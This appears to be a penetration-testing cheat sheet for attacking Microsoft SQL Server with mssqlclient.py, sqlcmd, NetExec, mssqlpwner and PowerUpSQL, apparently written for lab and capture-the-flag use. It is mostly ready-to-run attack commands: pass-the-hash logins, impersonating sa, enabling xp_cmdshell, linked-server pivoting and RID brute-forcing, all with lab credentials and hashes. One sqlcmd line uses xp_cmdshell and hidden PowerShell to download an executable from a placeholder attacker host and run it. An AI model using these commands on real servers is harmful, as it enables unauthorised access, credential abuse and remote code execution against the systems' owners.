MSSQL tooling should support the methodology: connect, enumerate, test permissions, execute queries, pivot, and clean up.
mssqlclient.py
SQL authentication:
mssqlclient.py user:Passw0rd!@10.10.10.5 -port 1433
Windows authentication:
mssqlclient.py LAB/user:Passw0rd!@10.10.10.5 -windows-auth
Pass-the-hash:
mssqlclient.py LAB/user@10.10.10.5 -windows-auth -hashes :8846F7EAEE8FB117AD06BDD830B7586C
Kerberos:
KRB5CCNAME=/tmp/cc mssqlclient.py LAB/user@10.10.10.5 -k -no-pass
AES key:
mssqlclient.py LAB/user@10.10.10.5 -k -aesKey HEX_AESKEY
Handy flags:
-db DB
-dc-ip IP
-debug
Useful prompt commands:
enum_impersonate
exec_as_login sa
enable_xp_cmdshell
xp_cmdshell whoami
enum_links
use_link LINKNAME
One-shot from shell:
echo "SELECT @@version;" | mssqlclient.py user:pass@10.10.10.5 -db master
echo "SELECT name FROM sys.databases;" | mssqlclient.py LAB/user:pass@10.10.10.5 -windows-auth
sqlcmd
SQL auth:
sqlcmd -S 10.10.10.5 -U sa -P 'Passw0rd!'
TCP and port:
sqlcmd -S tcp:10.10.10.5,1433 -U user -P pass
Windows Integrated auth:
sqlcmd -S 10.10.10.5 -E
Encryption with trusted lab cert:
sqlcmd -S 10.10.10.5 -U user -P pass -N -C
Choose database:
sqlcmd -S 10.10.10.5 -U user -P pass -d master
One-shot:
sqlcmd -S 10.10.10.5 -U user -P pass -Q "SELECT @@VERSION;"
sqlcmd -S 10.10.10.5 -U user -P pass -Q "SELECT name FROM sys.databases;"
sqlcmd -S 10.10.10.5 -U user -P pass -Q "EXEC sp_who2;"
Run a script:
sqlcmd -S 10.10.10.5 -U user -P pass -i script.sql -o output.txt
CSV-style output:
sqlcmd -S 10.10.10.5 -U user -P pass -d master \
-Q "SELECT name FROM sys.databases;" \
-W -s"," -h-1 -w 8192 -o dbs.csv
Stage and run payload through xp_cmdshell:
sqlcmd -S 10.10.10.5 -U sa -P pass -Q "EXEC xp_cmdshell 'powershell -w hidden -c iwr http://ATTACKER/s.exe -o C:\Windows\Temp\s.exe'; EXEC xp_cmdshell 'C:\Windows\Temp\s.exe';"
Useful switches:
-Q run and exit
-q run and stay
-l login timeout
-t query timeout
-b exit non-zero on SQL error
-r 1 send errors to stderr
-W trim spaces
-s separator
-h-1 suppress headers
-w output width
NetExec MSSQL
RID brute:
nxc mssql 10.129.181.153 -u kevin -p 'iNa2we6haRj2gaw!' --rid-brute --local-auth
Use this for username discovery and SQL authentication validation during lab enumeration.
mssqlpwner
Interactive mode:
mssqlpwner SIGNED.HTB/mssqlsvc:'purPLE9795!@'@10.129.58.60 -windows-auth interactive
Example direct query:
(interactive) direct-query "SELECT suser_sname(owner_sid) AS owner FROM sys.databases WHERE name='msdb';"
Linked server output example:
[*] Chosen linked server: DC01
[*] Result: (Key: owner) sa
PowerUpSQL
PowerUpSQL is useful after Windows foothold or domain context.
Common workflow:
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
Get-SQLConnectionTestThreaded
Get-SQLServerInfo -Instance SQL01
Get-SQLServerLink -Instance SQL01
Get-SQLServerLinkCrawl -Instance SQL01
Invoke-SQLOSCmd -Instance SQL01 -Command "whoami"
Use tool output as leads. Confirm manually with T-SQL before building an escalation chain.